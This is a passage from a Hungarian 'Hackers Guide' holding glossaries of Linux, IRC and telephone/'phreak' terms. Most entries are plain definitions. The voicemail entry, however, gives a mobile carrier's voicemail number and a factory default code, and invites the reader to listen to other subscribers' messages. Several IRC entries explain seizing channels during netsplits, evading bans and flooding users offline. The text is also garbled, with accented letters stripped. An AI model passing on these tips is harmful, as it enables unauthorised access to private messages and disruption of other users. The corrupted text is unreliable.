jl a modulok. Ezeket mindig az adott rendszermaghoz kell fordtani, s szksg esetn be lehet tlteni a magba, ill. ki lehet onnan venni. Gyakorlati plda: tegyk fel, hogy van egy AMIGA szmtgpeket hasznl ismersnk. Az affs (amiga filesystem) tmogatst nem fordtottuk bele a rendszermagba, de elksztettk modulknt. Ismersnk meghozza a kemnylemezes meghajtjt, mi betltjk az affs modult s mris tudjuk olvasni az adatokat... mount = beszerel(s) vagy beilleszt(s) A fizikai rtelemben vett szerelsen kvl a mount file-rendszerek beillesztst jelenti. A Linux (UNIX) opercis rendszer behzs (boot) utn az .n. root file-rendszert mount-olja elszr. Ez szksges a rendszer futtatshoz. Ksbb jabb s jabb file-rendszerek illeszhetk be, ill. tvolthatk el. A floppy meghajtban tallhat lemez valamilyen file-rendszert hordoz, mely valsznleg csak az rs-olvass idejre kerl beillesztsre, majd kikerl onnan, ha a lemezt el akarjk tvoltani. File-rendszert hlzaton keresztl is beilleszthetnk a rendszerbe, ennek a neve az NFS. {N} {O} {P} patch = folt A foltok ltalban kt forrskd kztti klnbsgeket tartalmazzk. Ez egyrszrl azrt lehet j, mert egy adott program jabb verzijnak megjelense esetn nem szksges az j verzi teljes forrskdjt ismt letlteni, hiszen a szksges vltoztatsokat a foltok hordozzk, illetve kisebbnagyobb hibajavtsok, kiegsztsek esetn ltalban csak ezeket a nhny soros foltokat kell alkalmazni, s ebben az esetben sem kell a teljes (javtott) programot beszereznnk. path = tvonal vagy elrsi t A PATH lehet egy krnyezeti vltoz, amely tartalmazza a teljes elrsi tvonal nlkl megadott file-ok lehetsges elrsi tvonalait, de lehet
63
Hackers Guide
magnak az elrsi tnak a neve is. Pl.: ennek az dokumentumnak a neve: dict.html, a hozz tartoz elrsi t: www.datanet.hu/generations/linux/. {Q} {R} root = root ??? Az a hozzfrsi nv szokott lenni a Linux-os (UNIX) opercis rendszerekben, mely rendszer szinten engedlyezi a file-ok, belertve a knyvtrak, file-rendszerek megvltoztatst, trlst. A root hozzfrssel rendelkezk ltalban a rendszeradminisztrtorok, akik a rendszer mkdsrt felelsek, tekintettel arra, hogy root-knt val bejelentkezs utn az illetre nem vonatkoznak a biztonsgi megktsek, korltlanul tehet brmit. ppen ezrt a root jelszavt srn vltoztatjk, ill. sok helyen mr nem is gy hvjk. root directory = fknyvtr vagy tknyvtr A t file-rendszeren tallhat, a knyvtr-hierarchia kiindulpontja. A fknyvtrbl indulnak a tovbbi alknyvtrak. Az Linux-os (UNIX) opercis rendszereknl a DOS-sal ellenttben csak egyetlen fknyvtr van, az egyes meghajtk, ill. az azokon trolt file-rendszerek ms alknyvtrak al illesztdnek be. {S} shell = parancsrtelmez vagy burok ? A shell az ami parancsainkat, utastsainkat rtelmezi s rendszerszinten vgrehajtja azokat. Tbb fle shell ltezik, melyek mkdse, parancskszlete kisebb-nagyobb mrtkben eltr egymstl. A legnpszerbb shell-ek kz tartoznak a bash, a tcsh, a zsh s a ksh. shell script = parancsprogram vagy burokprogram A shell sajt parancsaibl s kls programokbl (parancsokbl) ll program. A legtbb eltrs a shell-ek kztt itt tapasztalhat. Ugyan alapjaiban a shell script-ek nyelvei azonosak, de lnyeges eltrs lehet mind a parancskszletben, mind pedig a helyesrsban. site = hely Elssorban az Interneten hasznlt kifejezs a klnbz clokkal ltogathat helyek miatt. Ilyen rtelemben hasznljk a WWW site (WWW hely) s az FTP site (FTP hely) kifejezst. swap = csere A Linux-os opercis rendszerek a memriaignyek kielgtsre j hatkonysggal hasznljk az .n. swap eljrst. ltalban ltezik egy swap file vagy swap partci ahov az ppen alv programok, programrszek ill. azok adatai tkerlnek, gy a rendes memriban marad hely az aktv programok szmra. swap file = csere file Az a file, melybe az ppen alv programok, programrszek, ill. adatai kikerlnek. swap partition = cserepartci A kemnylemezes meghajtnak egy olyan partcija, melyet az alv programok, ill. azok adatainak ideiglenes trolsra hasznlnak, ha a rendes memria nem elegend az aktv programok memriaignyeinek kielgtsre.
64
Hackers Guide
Tekintettel arra, hogy a cserepartciknak sajt file-rendszerk van, gyorsabban mkdnek, mint a csere file. symbolic link = jelkpes kts Az ext2 file-rendszer megengedi, hogy valamely knyvtrban ugyanazon vagy ms nven szerepeljen egy msik knyvtrban tallhat file, de csak jelkpesen. A file ugyanis tovbbra is az eredeti knyvtr "tulajdona" marad, de ebbl a msik knyvtrbl gy ltszik, mintha ott lenne. File lehet egy msik knyvtr is, gy jelkpesen az is szerepelhet mshol. Egy gyakorlati plda: tegyk fel, hogy a jelenlegi Linux rendszermagunk forrskdja a /usr/src/linux-2.0.18-ban van. Sok program azonban fordts kzben a /usr/src/linux knyvtrban keresi a forrskdot. Mi azonban nem akarjuk ezrt az eredetit tnevezni, mert mindig els rnzsre szeretnnk tudni, hogy milyen verzij forrskdunk van meg. A megolds, hogy ksztnk egy jelkpes ktst a /usr/src/linux-rl a /usr/src/linux-2.0.18-ra, s gy az elbbi nven is elrjk az utbbit. {T} {U} uid (user identifier) = felhasznli azonost Minden kiszolgl gpnek van felhasznlja (van amelyiknek csak a rendszergazda), s minden felhasznlnak van sajt uid-je. Ez egy szm mely alapjn a rendszer azonostja pldul, hogy melyik file kihez tartozik. Az uidhez ltalban tartozik egy login (bejelentkezsi) nv is, gy ltalban az kerl kirsra ha pl. listt krnk egy knyvtr tartalmrl. Lsd mg: gid. user = felhasznl Az a szemly, aki az opercis rendszert, s az azon fut alkalmazsokat hasznlja. Az egyszer felhasznl ltalban nem foglalkozik a rendszerrel mlysgben, azt nem vltoztatja, vagy nem is vltoztathatja meg. Tbbnyire semmi mst nem csinl, csak belp a rendszerbe, elindt egy-kt programot, dolgozik azokkal, majd kilp. user account = felhasznli hozzfrs Lsd: account. {V} {W} WWW = World Wide Web = Vilgmret hl Az Internet adta mszaki lehetsgeknek, ill. a HTML kifejlesztsnek ksznhet a WWW kialakulsa. Ez a XX. szzad vgn hiper sebessggel kialakul hipermdia. Ellenttben az jsgokkal, a rdival s a televzival, a WWW egy minden szempontbl interaktv dolog. Itt nem csak olvasunk, nznk s hallgatunk, hanem mi vagyunk azok, akik megmondjk, hogy mit, mikor s hol nznk. Dntseink nem csak a kapott informcit befolysolhatjk, de rintkezhetnk az egsz vilggal. Brmikor dnthetnk gy, hogy krnznk Japnban, benznk Washingtonba, vagy ppen itthon "kirndulunk" egy kicsit. A hipermdia egyenes kvetkezmnye a kibertr. A kibertrben sok mident lehet csinlni, msodpercek alatt el lehet jutni olyan helyekre, ahova jrmvel taln soha nem jutunk, megtehetnk olyan dolgokat,
65
Hackers Guide
amit taln soha nem tehetnnk meg s beszlgethetnk olyan emberekkel, akikkel taln - fleg a nagy tvolsgok miatt - soha nem tallkozhattunk volna. {X} {Y} {Z}
************************************************************************************************
IRC sztr Ha valami nem pontos, tudsz olyan fogalmat hinyzik s itt lenne a helye, vagy nem rted az egyik magyarzatot, rd meg nekem! Minden levlre szvesen vlaszolok. BOT EGGDROP fenntarott csatornk Channel Delay csatorna desync firewall flood G-LINE IP IRCOP K-LINE lag massxy netsplit nick collision Nick Delay serverop smiley PartyLine re takeover BOT A BOT a robot sz rvidtsbl ered. A BOT-ok ugyanolyan felhasznlk, mint brki ms, csakppen olyan serveren vannak, amik mindig net sszekttetsben llnak, s az emberek helyett itt egy program cselekszik, mindig az adott helyzetnek megfelelen. Nagy - de igen gyakori - tvhit teht, hogy otthonrl, telefonos sszekttetsnl elindtva egy programot, botot tudunk futtatni server nlkl. BOT-ot rni hossz id, ezrt legtbben olyan BOT-okat hasznlnak, amit mr valaki ms megrt - csak megfelelen be kell t konfigurlni. A legelterjedtebb az EGGDROP BOT. Kapcsold tmakrk: EGGDROP parancsok s jogok PartyLine CSATORNA A csatornk nevei #, & , + vagy ! jellel kezddnek, majd egy (maximum 200 karakter hossz) nvvel folytatdnak. A # jellel kezdd csatornk a hl minden serverrl ltszdnak, mg ha egy csati neve &-al kezddik, akkor az csupn csak egy serveren l, azon amelyiken meg lett nyitva. A +-os csatornk mode-talanok (nincs op, stb.). A ! jeles csatornk abban klnbznek a tbbitl, hogy netsplit esetn mskpp viselkednek (ez a csatifajta a 2.10-es serverektl kezdve van, s a mIRC mg nem tmogatja). Vannak a server ltal fenntartott csatornk, ezeken nem beszlgetni lehet, hanem a server zenetetit hallgatni. Ilyenek pl.: &errors - "server error messages", hibazenetek, kirja pl. ha valaki fel akar csatlakozni a serverhez, de a server "tele van". &kills - "operator and server kills", jelzi a nick collosionokat, vagy ha egy IRCOP a
66
Hackers Guide
KILL parancsot hasznlja. &local - "noticees about local connections", jelzi, ha valaki tl sok klnnal akar feljnni, stb. &servers - "servers joining and leaving", jelzi ha egy server levllik Egyb: & notices, &services, &numerics, &hash, &channel Ezek a csatornk +a s +q flag-ekkel rendelkeznek. Magyar csatornk pl.: #Babalany , #csevej , #aladdin , #debrecen , #getto , #irckocsma , #magyar , stb... A JOIN parancs. Channel Delay DESYNC Netsplit vagy lass serverkommunikci miatt ltrejhet egy olyan llapot, hogy az egyik serveren lvk mst ltnak egy csatornn, mint a msikra csatlakozottak. Ez nevezzk DESYNC-nek. Ilyenkor elfordulhat, hogy ltszlag van OP-od, valjban viszont nem tudod hasznlni, hibazenetet kapsz, pedig amit kiadtl parancsot, az "hibtlatnul" teljestve lett, moderated csatornra +o ill. +v nlkl tudsz rni, stb. FIREWALL A tzfal a bejv s kimen adatokat figyeli, s szksg esetn BLOCK-olja. Egy jl konfigurlt tzfallal vdett gpet csak olyan programhiba kihasznlsval lehet lefagyasztani, amely nem hasznl TCP/IP-t. Kapcsold tmakr: Firewall otthonra - a ConSeal Firewall letltse s bekonfigurlsa. FLOOD Ha valakinek nagyon nagy az adatforgalma, akkor a server kidobja "excess flood" zenettel. Ez a LAG s a NETSPLIT-ek elkerlse rdekben van bevezetve. A FLOOD-olst rosszindulatuan is lehet hasznlni - ha egyszerre tbben folyamatosan adatokat kldenek valakinek (pl. PING-elik), akkor knnyen meglehet, hogy az illet kiesik a serverrl. Kapcsold tmakr: FLOOD tpusok s hasznlatuk. G-LINE Ha valami rosszat tesz valaki, akkor egy IRCOP G-LINE-ra tudja tenni, letiltva ezltal az sszes hln lv serverrl. Kapcsold tmakr: Hogyan juss be egy csatira vagy serverre, ha BAN-oltak? IP Az Interneten mindenkinek van egy azonost szma, amirl meg lehet ismerni. Ez az IP-cm. Mivel ez egy nagyon hossz szm, pontozottdecimlis alakban szoktuk hasznlni, ami x.x.x.x alak, ahol x 0-tl 255-ig tetszleges szm. Van static IP (minden esetben ugyanaz az IP cme valakinek. Ilyen pl. a www.microsoft.com-nak az IP-je :), s dynamic IP (minden csatlakozskor ms az IP cme valakinek. Pl. modemes Matvnet elfizetk). Ha valaki "tbb pldnyban" van fenn az IRC-n, akkor erre az IP cme alapjn rjhetnk (ha kt nick IP cme egyezik, akkor
67
Hackers Guide
ugyanazon a gprl van mindkett). FONTOS, hogy ez nem minden esetben igaz, pl. ha az illet tzfal mgtt van, akkor csak a tzfal IP-cmig jutunk el (pl. firewall.matav.hu). IRCOP (IRC Cop, Oper) Az IRCOP nem egyenl azzal, hogy valaki egy csatornn OP-os. Azt nevezzk IRCOP-nak, akinek egy IRC serveren van OP-ja, nem csatornra gyel, hanem az IRC hlzatra. Kellemetlen dolog haragban lenni egy IRCOP-al, mindenesetre semmikppen sem vgleges hiba, akkor sem, ha BAN-ol a serverrl, hiszen egy lelemnyes felhasznlt ez nem llthat meg... Megszokott tvhit, hogy az IRC opertorok segtenek ha elfoglaljk a csatorndat ez nem gy van, egyrszt mert az IRCNET-en nincs a csatornknak tulajdonosa, msrszt pedig mert az IRCOP nem tudhatja, hogy a csatorna eredetileg ki volt... Az IRCOP-ok - elvileg - nem foglalkoznak a csatornk gyeivel kapcsolatban. Hogyan lehetsz IRCOP? Az IRC.BME.HU oldaln azt rjk, hogy csak gy, ha csatlakoztatod a serveredet az IRC hlhoz. Pr sorral alatta pedig azt, hogy a mostani 4 IRC server tbb mint elg, ezrt nem engedik tovbbiak csatlakoztatst. Vajon akkor mirt rtk ki pont ezek felett, hogy milyen gpkvetelmnyek vannak, ha valaki csatlakozni akar a servervel? Ahhoz, hogy IRCOP legyl, elszr is nagyon jl meg kell ismerned a UNIX-ot, msodszor mindent meg kell tanulnod az IRC-vel s a legnpszerbb kliensekel (ircII, mIRC) kapcsolatban (ha valaki krdez valamit, tudnod kell vlaszolnod r...), ezutn pedig mindent meg kell tanulnod a TCP/IP-rl... Ha mindez megvan, szksged van egy megfelel serverre, lehetleg T1 csatlakozssal (az ISDN s a modemek rendszerint nem elg gyorsak), s ezutn tallnod kell egy servert, amihez csatlakoztathatod. Kapcsold tmakr: Hogyan juss be egy csatira vagy serverre, ha BAN-oltak? IRCOP parancsok K-LINE Ha valami rosszat tesz valaki, akkor egy IRCOP K-LINE-ra tudja tenni, letiltva ezltal az illett a serverrl. Kapcsold tmakr: Hogyan juss be egy csatira vagy serverre, ha BAN-oltak? LAG Akkor mondjk, hogy LAG van, amikor az adatok lassan rkeznek meg valahonnan valahov. Pl. ha sokig nem r senki, majd hirtelen tele lesz 2 oldal, akkor azt mondhatjuk, hogy "nagy a LAG". MASSxy Ha valaki egyszerre mindenkitl elveszi az OP jogot, azt MASSDEOP-nak hvjuk. Ezen szintaktika szerint lehetsges MASSKICK-rl, MASSINVITE-rl, s hasonlkrl beszlni. NETSPLIT
68
Hackers Guide
A netsplit azt jelenti, hogy kt (vagy tbb) IRC server kztt megszakadt a kapcsolat. Ilyenkor "* [nick] has quit IRC ([servernv] [servernv])" zenettel tnnek el a szemed ell a nick-ek... Nzznk egy pldt! Legyen A, B, C, D s E egy-egy IRC server! A kapcsoldsi pontjaik: A---B---C | | D E Ha A s B kapcsolata megszakad, akkor pl. a D-rl az ltszik, hogy az E-n lv emberek kiestek - ugyanakkor pl. a C-n lv emberek szmra is eltnnek az A serveren lvk. Netsplitnl nha elfordl, hogy az egyik server tlltja a csati mode-jait, vagy egy ember flag-eit (pl. * irc.bme.hu sets mode +o ViDe0). Ha valamirt netsplit van, akkor (ha nem serverreconnect miatt volt "split") adott ideig (ez serverbelltstl (Nick Delay & Channel Delay) fgg) bizonyos nick-ek s csatornk nem hasznlhatak ezek azok, amik egy msik serveren ltek. Ilyenkor "temporarily unavailable" hibazenetet kapunk, ha megprbljuk ket hasznlni/elrni. 10 perc utn viszont ismt szabad lesz mind, s ha addig nem lett vge a splitnek, akkor a leszakadt serveren opot kaphat egy ilyen csatin az az ember, aki elszr megnyitja. Az ltala tlltott mdok, s az j OP-osok a netsplit vgn az eredeti csatornra is hatssal vannak - azaz az illetnek ott lesz opja, s a megvltozott csatibelltsok is rkldnek. Ilyen mdon az illet akkor is be tud jutni egy csatornra, ha onnan BANolva van, ill. ha az +i-s, +k-s, vagy +l-es. Kapcsold tmakr: &servers NICK COLLISION Nick collision ltrejhet netsplit vagy lag miatt is. Ha pl. netsplitnl az egyik serverre olyan nick-el megynk fel, ami a hlzat ppen nem ltott rszn mr hasznlva van, akkor amikor a serverek ismt sszekapcsoldnak, mindketten kiesnek az IRC serverrl (annak elkerlse vgett, hogy ketten ugyanazt a nick-et hasznljk). Kapcsold tmakr: nick collision statisztika [angol] SERVEROP Ha valakinek egy server ad opot, azt SERVEROP-nak hvjuk (lsd.netsplit). SMILEY A SMILEY-ok, azaz a mosolyok a testbeszd helyettestst hivatottak szolglni IRCn. A leggyakrabban hasznltak a :) s a :( verzik, melyek 90-al elforgatva nzve egy-egy fejecskt adnak (a ":" jelkpezik a szemeket, a ")" pedig a szjat). Az eredeti vltozatban :-) a mosolyg arc, a :) ennek rvidtett formja. Jelentse vltoz, kifejezhet rmt vagy vidmsgot egyarnt. Szintn gyakorta hasznlt a ;/ forma, amely mint lthat "szjhzst" utnoz - a klnlegessge abban rejlik, hogy angol billentyzeten a ";" s a "/" jelek egyms alatt tallhatak, gy az bra elksztse csak egy "ujjvons". Szintn hasonl a =]
69
Hackers Guide
figura, ahol mindamellett, hogy a "=" s a "]" karakterek egyms alatt vannak, a kvetkez billenty az ENTER, gy mg ahhoz sem kell mozdtani a keznket. Hasznlatosak ezek fordtottjai is ((: , ): , /;), illetve egyb vltozatok ( :D , :C , >:) , :`(`` , stb. (nevets, mly szomorsg, rdgi mosoly, srs)). PARTYLINE Az EGGDROP botok egymssal sszektve alkothatnak egy gynevezett PartyLinet, amire DCC CHAT-el, vagy TELNET-elssel lehet csatlakozni. A PartyLine elnyei, hogy netsplit esetn sem szakad meg a kapcsolat - hiszen ircservertl fggetlen tovbb ltalban sokkal gyorsabb is - szintn ezen okbl kifolylag. Ha a BOT nevben akarsz kiadni parancsot, azt is itt teheted meg. RE Ksznsi forma IRC-n, akkor hasznlatos, amikor jbl tallkozol valakivel rvid idn bell. TAKEOVER A takeover annyit jelent, hogy valaki elfoglal egy csatornt. Ennek tbbfle mdja van, az egyik, hogy valamilyen mdon OP-ot szerez az illet, s mindenki mst megfoszt az opertori jogtl, a msik az, hogy mindenkit "kil", aki a csatin van.
************************************************************************************************
Phreak sztr
A5/1:A GSM rendszernek sajt kidolgozott titkost algoritmusai vannak. A Westel 900 s valamennyi eurpai orszg az A5/1 vltozatot hasznlja. A titkost eljrs bemeneti paramterei a 22 bit hosszu keretsorszm (FrNo), s az autentikci sorn kiszmtott Kc titkost kulcs. A GSM rendszerben hasznlt valamennyi jelzo s informcis bit, a PCM technikban hasznlatos kerethez hasonl GSM TDMA keretbe vannak szervezve. A tbb keretbol ll hiperfrm kzel 3.5 ra hossz. A keret sorszma nem folyamatosan inkrementldik, hanem hrom klnbzo keretjellemzo paramter kombincijbl jn ltre. A titkosts csak a levegoben utaz biteket vdi. A vezetkes hlzatba irnyul hvs vdettsgi szintjt a mobil hlzaton kvl a GSM rendszer nem tudja befolysolni. Hasonl a helyzet kt GSM hlzat kztt felptett kapcsolat esetben is. Ilyekor lehetsges, hogy a nemzetkzi tvkzlsi utakon keresztl az informci hozzfrheto harmadik fl szmra is. A/D TALAKIT (ADC = Analg Digital Converter): Az analg jelet digitliss (ltalban binriss) talakt ramkr. A kvnt felbontstl s a szksges mintavteli frekvencitl fggoen tbbfle felptsu s mukdsi elvu ADC ismert.
70
Hackers Guide
Legfontosabb paramtereik: a kvantlsi bitek szma (pl. 18), a mintavteli frekvencia (pl. 48 kHz) s a kvantls mdja (lineris vagy nemlineris), a feldolgozhat maximlis amplitd s a mukdsi elv (pl. szukcesszv approximci). ADATJEL: Analg vagy digitlis jel, amely felhasznli informcit hordoz. ALKZPONT(PBX): A fokzponthoz hasonl tuds, m kismretu telefonkzpont, amely magnhlzatokban zemel. LLAND ZEMMD SZOLGLTATSOK: Az gyfltol kln aktivlst vagy mukdtetst nem ignyelnek, mert az aktivlst a szolgltat vgzi el a megrendelskor (pl. kzvetlen bevlaszts). Definity-plda: egy mellk letiltsa. ANALOG JELEK: Pl. beszd kzben ltrejvo levegorezgsek (hullmok). Formjuk hasonlatos (analg) azzal a hatssal, amely ltrehozta oket. Vgtelen klnbzo rtket vehetnek fel. A tvkzlsben az analg jeleknek hrom jellemzoje kiemelten fontos: az amplitd, a frekvencia s a fzis. ATM-TVITEL: Asyncronous Transfer Mode, azaz csomagkapcsolt, aszinkron, kapcsolatorientlt tvitel (=> csomagkapcsolt tvitel). Kapcsolatorientlt, mert a cellafolyam tovbbtsa, azaz az informcitranszfer elott trtnik az tvonalvlaszts, utna pedig az tvonallebonts. Aszinkron, mert nem kell az ad s a vevo oldalt szinkronizlni az informcitvitelhez. Csomagkapcsolt, mert az ATM-cellk autonm mdon jutnak el a feladtl a vevoig. ATM-CELLA: Az ATM-tvitel alapegysge (=> ATM-tvitel). 53 byte hossz, ami 5 byte fejlcbol ll; itt helyezkedik el az tvonalinformci, a hibajavts, a priorits, stb. A cella tbbi 48 byte-ja tartalmazza a felhasznli informcit. AUTOMATIKUS HVSELOSZTS: Rugalmas megoldst knl a bejvo hvsok hatkony s egyenletes elosztsra az elrheto gyintzok kztt. Forgalmi terhelstol fggoen lehet vlasztani a hvselosztsi mdszerek kztt. Minden csoport vrakozsi sora is bellthat. A soron bell prioritst is meg lehet hatrozni. CALLER ID: Calling Number Delivery (CND) Hivas azonositas,1999. ig hazankban nem mkodott csak rendorsg tzoltosg hasznlhatta de vrhatan 2000. tl a sima elfizetk is hasznalhatjak ha minden igaz.Haszlatnak letiltsnak oka a szemlyisegi jogok voltak .=) CARRIER: Az a hang amikor felhvod az internet szolgltatdat s ilyen fura spolsokat hallasz... ekkor a modemek informcit cserlnek, s megllapodnak egyms kzt a kapcsolat sebessgrol s egyb dolgokrl. Na ez az idezet vajon kitol van?6 pontos krds. CB-TELEFON: A kzpontbl tpllt (Central Battery) kszlk. Ebbe a rendszerbe tartozik szinte minden telefon, amellyel az tlagember tallkozik. (=> LB-telefon) CB-MODEM: |PC|<-->|CB-MODEM|<-->|CB|<-->|VEVOCB|<-->|CBMODEM|<->|MASIKPC| CELLURAR RADIO:900Mhz Rvid en de velosen az elv:Minden egyes cellban van egy bzis lloms,amelyet egy plet vagy hegy tetejre gy helyeznek el,hogy az kommuniklni tudjon a cellban lvo sszes radival(Mobil T).Mostantol a radi a mobilt jelenti.Naszval aimkor egy mozg telefont bekapcsolnak akkor az vgigpsztazza a bzis llomsok frekvencijit azrt hogy a legerosebb jelet magtallhassa(valoszinleg a legkzelebbi llomst) s egy a telefon szmt bejelento zenetet kuldhessen.A bzis lloms ezutan kzli a mozgtelefonnal,hogy melyik cellban van,s melyik frekvencit hasznlhatja.Amikor egy mozgtelefon hvst szndkozik kezdemnyezni akkor a bzillomsnak egy zenetet kld s az kijelli neki egy neki megfelelo frekit (ha van ilyen) A hvs befejeztvel a bzis tveszi a frekencit s egy msik hvnak adjaTbb cellban is alkalmazhat ugyanaz a frekvencia ha megoldott ,hogy az adk egyms
71
Hackers Guide
hattvolsgan kivul legyenek.Amig a mzg telefonok be vannak kapcsolva,folyamatosan figyelik a bzis llomsok frekvenciit,hgoy tudjak melyik lloms frekvencija a legerosebb.Amikor egy msik vlik erosebb (vlhatoen mert egy masik j cellba kerult) a telfon jelenti ezt a bzisllomsnak,amely tadja a kapcsolatot a msik bzisnak.Az j bzis utasitja a telefont ,hogy kapcsolodjon t az j frekvencira Azert fontos,hogy a bzis llomsok mindvgig ismerjk a mozgtelefonok holltt,hogy a bejovo csomagokat a megfelelo bzis alloms fel tovbbthassk. A telefonok helyt egy szmtgp tartja folyamatosan nylvn,amelyhez az sszes bzis llomas hozza frhet, ye 1984 =).Kvkp orwell nagy testvre elbujhat CROSSBAR- RENDSZER: A kzs vezrlsu mechanikus kapcsolrendszer egyik tpusa. Minden szmjegyet osztlyoz, mg a trcszst be nem fejezzk, majd a hvs tovbbtsa elott egy szabad tvonalat keres. CRACKER:klnbzo opercis rendszerekre s platformokra specializldtak. Prblgatnak, kisrleteznek amig valami "hasznlhatra" nem bukkannak. Elso lpsben a cl interaktv kapcsolat (login) megszerzse, ami kemny munkval tovbbfejlesztheto root avagy superuser jogkrr, aki egy-egy gp legfobb adminisztrtora. A kis kzsgeket az rdeklods nagyobb kzssgekk formlja, mert a tuds, tapasztalat gy sokkal jobban tadhat. CSOMAGKAPCSOLT TVITEL (Packet switching): Az informcitovbbts csomagokban trtnik. A csomagok a tovbbtand informci feldarabolsval keletkeznek, amit fejlccel ltunk el. A fejlc tartalmazza az tvonalinformcit, a prioritst, a hibajavts informciit, stb. A vevooldalon a fejlcet levlasztjuk, majd a csomagokbl visszalltjuk az eredeti informcit. (=> vonalkapcsolt tvitel) CIRCUIT SWITCHING:Vonal kapcsols.A vonal kapcsolas lnyeges tulajdonsga az , hogy a vg-vg kapcsolatot az eltt fel kell pteni mg mieltt mg brmi fle adatot kldeni lehetne.A trcszs vgtol a kicsrgsig eltelt ido nyagytavolsg, vagy nemzetkozi hvsok esetn akr 10 msodperc is lehet.Ez ido alatt a telefon rendszer egy fizikai utat pit ki.A hv jelnek egszen a hvott kszulkig kell jutnia,majd onnan egy nyugtnak kell visszarkeznie. BAUD:1Baud sebessgu az az tvitel,mely egy msodperc alatt 1 jelet visz t.Tiszta fizika ran rzem magam. Ha az tvitt jelek binris rtkek akkor a baud megegyezik a bit/szekundummal D/A TALAKT: (DAC = Digital Analog Converter): Digitlis (tbbnyire binris) informcit alakt analg jell. Tbbfle mukdsi elvut ismernk, pl. az integrl DAC-t. Fontos jellemzoje a max. rajel (a feldolgozhat max. mintavteli frekvencia) s a bitszm, azaz a felbonts. Ha a ADC nemlineris kvantls volt, akkor a visszaalaktsnl hasznlt DAC karakterisztikja tkrkpe kell legyen az ADC karakterisztikjnak (pl. logaritmusos - exponencilis). DIGITLIS JELEK: Az analg jelekkel (=> analg jelek) ellenttben csak meghatrozott szm klnbzo llapotuk ltezhet. Egyik legfontosabb tpus a binris jel, ahol csak kt llapot ltezik. Az letben a binris jelrendszerek olyannyira elterjedtek, hogy digitlis jelek alatt ltalban binris jeleket rtnk. DATEX-P: A szolgltatsban csomag kapcsolt adattvitelt hasznlnak. DTMF-rendszer (Dual Tone Multi Frequency system): Hangfrekvencis (tone) zemmdban minden billentyut egy frekvenciapr reprezentl. Minden szmhoz (valamint a * s # gombokhoz) egy alacsony s egy magas frekvencibl ll pr tartozik az albbi sma szerint: 1 2 3 A 697 Hz
72
Hackers Guide
4 5 6 B 770 Hz 7 8 9 C 852 Hz * 0 # D 941 Hz 1209 Hz 1336 Hz 1477 Hz 1633 Hz A megkvnt frekvenciapontossg: 11.8%.A tvkzlsben hvszmok cljra (ltalban) csak a 0 ... 9 szmjegyeket hasznljk, a * s a # nhny specilis funkcihoz szksges (pl. fax). Az A ... D billentyuk a kznapi kszlkeken nem tallhatak meg, s csak specilis clokat szolglnak. ECHO SUPPRESSOR:Visszhangelnyomo ez egy olyan eszkoz amely szleli az egyik oldalrol rkezo emberi hangot s a masik iranybl rkezo emberi hangot elnyomja.(analog anno) ELOKIEMELS (preemphasis): Mind analg, mind digitlis hangtvitelkor gyakori a hasznlata. Clja a jel-zaj viszony javtsa. Lnyege, hogy az eredeti frekvenciamenetet megvltoztatjk: a nagyobb frekvencij hangokat nvelt amplitdval szerepeltetik s az tvitel gy trtnik (=> utelnyoms). EURO-ISDN: A nyugat-eurpai tvkzlsi szolgltatk tbbsge 1989-ben nyilatkozatot rt al, hogy 1993-ig egy egysges, szabvnyos ISDN-t valstanak meg. 1993. decemberben kerlt sor bevezetsre, elnevezse eurpai kiterjedtsgre utal. Lehetov teszi, hogy a felhasznlk ugyanazon kszlkeket hasznlhassk az egyms kztti kommunikcira az Euro-ISDN-hez csatlakoz orszgokban. (=> ISDN) FEDETTSG: A mobiltelefon hasznlathoz szksges rdijelekkel elltott terlet. FLLLAND ZEMMD SZOLGLTATSOK: A szolgltattl val megrendels utn az elofizetonek kell aktivlni ill. deaktivlni. Aktivlt llapotban mukdsk automatikus, az elofizetotol kln beavatkozst nem ignyelnek (pl. hvstirnyts foglaltsg esetn). Definity- plda: hvsok elkldse hvsfedezsi tvonalra. FLDUPLEX TVITEL:Half-duplex, ha az adatokat egy vezetken mindkt iranyba tovabbthatjuk, de az adattvitel egy adott idben csak az egyik iranyban folyik.Ebben az esetben teht az ad s a vevo idonknt szerepet cserl. FREKVENCIA(CELLUAR): 900MHz telefon frekik Panasonic 900MHZ : CH BASE HANDSET -- ------- ------01 902.100 926.100 02 902.130 926.130 03 902.160 926.160 04 902.190 926.190 05 902.220 926.220 06 902.250 926.250 07 902.280 926.280 08 902.310 926.310 09 902.340 926.340 10 902.370 926.370 11 902.400 926.400 ^^^ ^^^
73
Hackers Guide
^^^ 59 903.870 927.870 ch(csatorna) base(bzislloms) handset(kzibeszlo) FOKZPONT: A nyilvnos hlzat azon pontja, ahol a helyi hvsokat kapcsoljk. Helyi, vagy vgkzpontnak is nevezik. FULL-DUPLEX TVITEL: Azt jelenti, hogy a kommunikci a kt fl kztt llandan ktirny s egyideju. Legjobb plda erre a telefonbeszlgets. GERINC: A hlzat fo sszekttetse. Pl. egy hrom kapcsolkzpontos (alkzpontos) magnhlzatot brelt tviteli szolgltatsok ktnek ssze. GSM: Global System for Mobile Telecommunications. A legelterjedtebb egysgestett digitlis mobiltelefon-szabvny. GSM rendszerben a maximlis cella sugr kb 35 km. HALZATI JELSZ: Klnbzo tiltsi GSM-szolgltatsok kszlken trtno aktivlshoz s deaktivlshoz szksges kdszm. HANGFREKVENCIA: Az rtheto beszd frekvencia tartmnya 300 s 3000Hz koz koncentrlodik Ezrt a norml telefoncsatornkat errre a svszlessgre terveztk meg.Az ilyen csatornt hangcsatonnak is nevezik mert ezen keresztl haladnak t az emberi hanggal kapcsolatos legfontosabb frekvencik HANGJEL: 300 Hz - 3400 Hz svszlessgu analg jel, amely a telefonban hallhat hangot lltja elo. HANDOVER: Handover, vagy handoff mint, ahogy szak Amerikban hvjk, egy folyamatban lvo hvs tkapcsolsa msik csatornra vagy cellra. HANGPOSTA:Mobiloknl a zenetrogzito tipp:pannon- a panonnl a hangposta szma: 06-20-9-400-400 majd meg kell adni a 7jegyu telcsiszmot utanna egy * s a kd ami a hangposta meghalgatshoz kell vagyis kellene mert elg sok gyagya mobilos van aki nem allitja t a gyri kdt ami 1111 utanna nyomj egy csillagot es meg is hallgathatod felte hogy nem vltoztata meg. HVSTIRANYITS: A hvstirnytsi szolgltatsnak klnbzo vltozatai ismertek: - hvstirnyts foglaltsg esetn (CFB = Call Forwarding Busy); hvstirnyts nem felel esetn (CFNR = Call Forwarding No Reply); hvstirnyts felttel nlkl (CFU = Call Forwarding Unconditional). HVS TILTS: A kimeno hvsok tiltsa. HVSONKNTI ZEMMD SZOLGLTATSOK: Az elofizeto - ignye szerint hvsonknt vagY mukdteti, vagy nem. Ezen szolgltatsokat is 